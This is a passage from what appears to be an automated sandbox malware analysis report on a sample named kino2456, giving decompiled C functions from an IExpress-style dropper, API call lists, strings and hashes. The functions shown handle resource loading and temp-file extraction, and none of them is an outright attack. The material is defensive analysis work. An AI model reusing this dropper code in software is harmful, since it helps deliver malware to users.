				return E00FC6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00fc6495
0x00fc6495
0x00fc64a0
0x00fc64a7
0x00fc64ab
0x00fc64bd
0x00fc64c2
0x00fc64d3
0x00fc64df
0x00fc64e8
0x00fc6502
0x00fc64ee
0x00fc64f9
0x00fc64f9
0x00fc6516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00FC64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00FC64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00FC6502

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC64AC
advpack.dll, xrefs: 00FC64C2, 00FC64CD, 00FC6501

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
API String ID: 438848745-3736221019
Opcode ID: f85be24ba09563ce774685779446adfb91d30f47eb9f671c6efe24439a8de27d
Instruction ID: f960f29c1252f3082d94311d05ae9fa76f71575612fdbbd33c30d9b427fe3f04
Opcode Fuzzy Hash: f85be24ba09563ce774685779446adfb91d30f47eb9f671c6efe24439a8de27d
Instruction Fuzzy Hash: 1501263094810D9BD710DB60DE4BFEA7338EB51310F50019DF485D30C0DF74AE8AAA01

Uniqueness

Uniqueness Score: -1.00%

Function 00FC28E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00FC2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00FC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00FC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x00fc28f1
0x00fc28f4
0x00fc28f7
0x00fc28f9
0x00fc28fc
0x00fc28ff
0x00fc2901
0x00fc2907
0x00fc2a62
0x00fc2a64
0x00fc290d
0x00fc290d
0x00fc290f
0x00fc2912
0x00fc2920
0x00fc2937
0x00000000
0x00000000
0x00fc2944
0x00fc294a
0x00fc294f
0x00fc2a2f
0x00fc2a32
0x00fc2a34
0x00fc2a37
0x00fc2a41
0x00000000
0x00000000
0x00fc2955
0x00fc295e
0x00fc2962
0x00fc2969
0x00fc296f
0x00fc2974
0x00fc298c
0x00fc2a20
0x00fc2a21
0x00fc2a27
0x00fc2a4c
0x00fc2a4f
0x00fc2a50
0x00fc2a53
0x00fc2a56
0x00fc2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc29b2
0x00fc29b2
0x00fc29b5
0x00fc29bd
0x00fc29c3
0x00fc29cc
0x00fc29d5
0x00fc29d7
0x00fc29da
0x00fc29dd
0x00fc29df
0x00fc29ec
0x00fc29f8
0x00fc29fc
0x00fc29ff
0x00fc2a02
0x00fc2a07
0x00fc2a0a
0x00fc2a0f
0x00fc2a19
0x00fc2a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc2a0f
0x00fc298c
0x00fc2974
0x00fc2962
0x00000000
0x00fc294f
0x00fc2912
0x00fc2a65
0x00fc2a68
0x00fc2a6c
0x00fc2a6f
0x00fc2a6f
0x00fc2a7d

APIs

GlobalFree.KERNEL32 ref: 00FC2A6F

Part of subcall function 00FC2773: CharUpperA.USER32(D6D6FCA6,00000000,00000000,00000000), ref: 00FC27A8
Part of subcall function 00FC2773: CharNextA.USER32(0000054D), ref: 00FC27B5
Part of subcall function 00FC2773: CharNextA.USER32(00000000), ref: 00FC27BC
Part of subcall function 00FC2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2829
Part of subcall function 00FC2773: RegQueryValueExA.ADVAPI32(?,00FC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2852
Part of subcall function 00FC2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2870
Part of subcall function 00FC2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00FC3938,?,?,?,?,-00000005), ref: 00FC2958
GlobalLock.KERNEL32 ref: 00FC2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FC3938,?,?,?,?,-00000005,?), ref: 00FC2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00FC2A81

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: f010f21b1a88c294563d4278e41fef36f372d2207d6d708992ec8e0c2999efc4
Instruction ID: bd76eb01a8b2a51cfaa92422e285a3b09e9810fa0ab20cea3ed8dfb2078890b6
Opcode Fuzzy Hash: f010f21b1a88c294563d4278e41fef36f372d2207d6d708992ec8e0c2999efc4
Instruction Fuzzy Hash: BE514A31D0021ADBCB61CF98CA86EAEBBB5FF48714F14412EE805E3211DB359941EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00FC4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E00FC468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00FC468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00FC44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00FC44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x00fc417d
0x00fc418f
0x00fc4193
0x00fc41b7
0x00fc41d3
0x00fc41e6
0x00000000
0x00fc41e7
0x00fc41d5
0x00fc41d6
0x00fc41d8
0x00fc41d9
0x00fc41da
0x00fc41df
0x00fc41e1
0x00000000
0x00fc41e1
0x00fc41b9
0x00fc41ba
0x00fc41bc
0x00fc41bd
0x00fc41be
0x00000000
0x00fc41be
0x00000000

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00FC30B4), ref: 00FC4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00FC30B4), ref: 00FC41E7

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Strings

FINISHMSG, xrefs: 00FC4173, 00FC41AB
<None>, xrefs: 00FC41C5

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 6d1383dc766d4a797f21e5b6be5307eb9475c3ad2ab2bb8be04391703c9453dd
Instruction ID: ceee6bfeccbae5e42b795dca0ae60ce2676a035bf722548e6cdd0b252ed3b452
Opcode Fuzzy Hash: 6d1383dc766d4a797f21e5b6be5307eb9475c3ad2ab2bb8be04391703c9453dd
Instruction Fuzzy Hash: 180121B270021A3BF32A16254EA7F7B718EEBC17E8F14002DBB02E21819E68EC113175

Uniqueness

Uniqueness Score: -1.00%

Function 00FC19E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FC19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00FC43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xfc9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00FC6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00fc19e0
0x00fc19e0
0x00fc19eb
0x00fc19f2
0x00fc19f9
0x00fc19fc
0x00fc1a01
0x00fc1a2a
0x00fc1a2e
0x00fc1a3e
0x00fc1a4f
0x00fc1a62
0x00fc1a6a
0x00000000
0x00fc1a03
0x00fc1a06
0x00fc1a20
0x00fc1a20
0x00fc1a08
0x00fc1a08
0x00fc1a14
0x00000000
0x00fc1a16
0x00fc1a18
0x00fc1a70
0x00fc1a72
0x00fc1a72
0x00fc1a14
0x00fc1a06
0x00fc1a81

APIs

EndDialog.USER32(?,?), ref: 00FC1A18
GetDesktopWindow.USER32 ref: 00FC1A24
LoadStringA.USER32(?,?,00000200), ref: 00FC1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00FC1A62
MessageBeep.USER32(000000FF), ref: 00FC1A6A

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: c30704d9e9f099726c9a2034cbf4348144f4470a81a853f84860d5637dc41657
Instruction ID: 025a3e1360200963b9b894a26ed94e354ceb8d318d3df910413fa68cef7506a6
Opcode Fuzzy Hash: c30704d9e9f099726c9a2034cbf4348144f4470a81a853f84860d5637dc41657
Instruction Fuzzy Hash: 5011703190110EAFDB10EF649F0AFAA77B8FB49314F108158E51693191DA34AE15FB95

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xfc8004; // 0xd6d6fca6
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xfc8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xfc8004 = _t39;
				}
				_t37 =  !_t36;
				 *0xfc8008 = _t37;
				return _t37;
			}

0x00fc715d
0x00fc7161
0x00fc7165
0x00fc7178
0x00fc7182
0x00fc718e
0x00fc7197
0x00fc71a0
0x00fc71b1
0x00fc71b8
0x00fc71c4
0x00fc71c7
0x00fc71cb
0x00fc71d5
0x00fc71da
0x00fc71da
0x00fc71dc
0x00fc71dc
0x00fc71e2
0x00fc71e5
0x00fc71ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00FC7182
GetCurrentProcessId.KERNEL32 ref: 00FC7191
GetCurrentThreadId.KERNEL32 ref: 00FC719A
GetTickCount.KERNEL32 ref: 00FC71A3
QueryPerformanceCounter.KERNEL32(?), ref: 00FC71B8

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 2989158878e0c052878ea874abf35378660888a1d6baa25390234b5ad3ae6446
Instruction ID: 42ffdc8137579e30a1ad5173e8ff8878c4182adb7c01b9423f7eb2bca3aabdb4
Opcode Fuzzy Hash: 2989158878e0c052878ea874abf35378660888a1d6baa25390234b5ad3ae6446
Instruction Fuzzy Hash: A211F871D0520C9BCB10DFB8DB4AA9EB7F4EB58315F654859D805E7214EB309A05AF41

Uniqueness

Uniqueness Score: -1.00%

Function 00FC63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FC63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00FC1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
				E00FC658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xfc9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xfc9124 = 0x80070052;
					_t37 = 0;
				}
				return E00FC6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x00fc63cb
0x00fc63d2
0x00fc63d8
0x00fc63ea
0x00fc63f3
0x00fc6401
0x00fc6402
0x00fc6410
0x00fc6415
0x00fc6433
0x00fc6438
0x00fc6449
0x00fc6463
0x00fc646d
0x00fc6477
0x00fc6477
0x00fc647a
0x00fc643a
0x00fc643a
0x00fc6444
0x00fc6444
0x00fc6492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00FC642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00FC645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00FC647A

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC63EB

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 1065093856-1610346413
Opcode ID: 551fe420b1c6694afa9d335d22cc393fd547fdfad10eb9dac67d313562f731b3
Instruction ID: 512791d231159d686da83d22f6fd457f78a768cf0309808f131bfc20942e37fe
Opcode Fuzzy Hash: 551fe420b1c6694afa9d335d22cc393fd547fdfad10eb9dac67d313562f731b3
Instruction Fuzzy Hash: CC210571A0421DABD710DF25DD8BFEB7368EB49314F0001A9F584E3180CAB46D849F60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00FC1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0xfc91e0; // 0xa28ec8
						 *(_t34 + 4) = _t11;
						 *0xfc91e0 = _t34;
						return 1;
					}
					_t25 =  *0xfc8584; // 0x0
					E00FC44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0xfc8584; // 0x0
				E00FC44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x00fc47e8
0x00fc47f0
0x00fc47f4
0x00fc480f
0x00fc4811
0x00fc4814
0x00fc4814
0x00fc4816
0x00fc4817
0x00fc4829
0x00fc482b
0x00fc482f
0x00fc484f
0x00fc4852
0x00fc4855
0x00fc4855
0x00fc4857
0x00fc4858
0x00fc4860
0x00fc4865
0x00fc486a
0x00fc486f
0x00000000
0x00fc4876
0x00fc4831
0x00fc4841
0x00fc4847
0x00fc480b
0x00000000
0x00fc480b
0x00fc47f6
0x00fc4806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00FC4E6F), ref: 00FC47EA
LocalAlloc.KERNEL32(00000040,?), ref: 00FC4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00FC4847

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC4851

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 359063898-1610346413
Opcode ID: 7b0071d5bdf6d7f37892a769d35e6ab97f91fd45aa94907e29760e4c323e2d39
Instruction ID: 6291deab20746b2dd671138e7830af6df0f128c39e975a802c3cfc27b1d739c0
Opcode Fuzzy Hash: 7b0071d5bdf6d7f37892a769d35e6ab97f91fd45aa94907e29760e4c323e2d39
Instruction Fuzzy Hash: 82115975A04606AFE7148F249E2BF733B5AEB81350F08841CFD8287381DA35AC06A720

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x00fc368c
0x00fc368f
0x00fc3691
0x00fc369f
0x00fc36a7
0x00000000
0x00000000
0x00fc36ba
0x00000000
0x00fc36bc
0x00fc36bc
0x00fc36c0
0x00fc36cb
0x00fc36c2
0x00fc36c4
0x00fc36c4
0x00fc36da
0x00fc36e0
0x00fc36e6
0x00000000
0x00000000
0x00fc36e6
0x00000000
0x00fc36ba
0x00fc36ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00FC369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC36B2
DispatchMessageA.USER32(?), ref: 00FC36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC36DA

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 647c3f14521dce53b7357bdc978a0aa6d082e70e26b2233ec6f75a320f1b300f
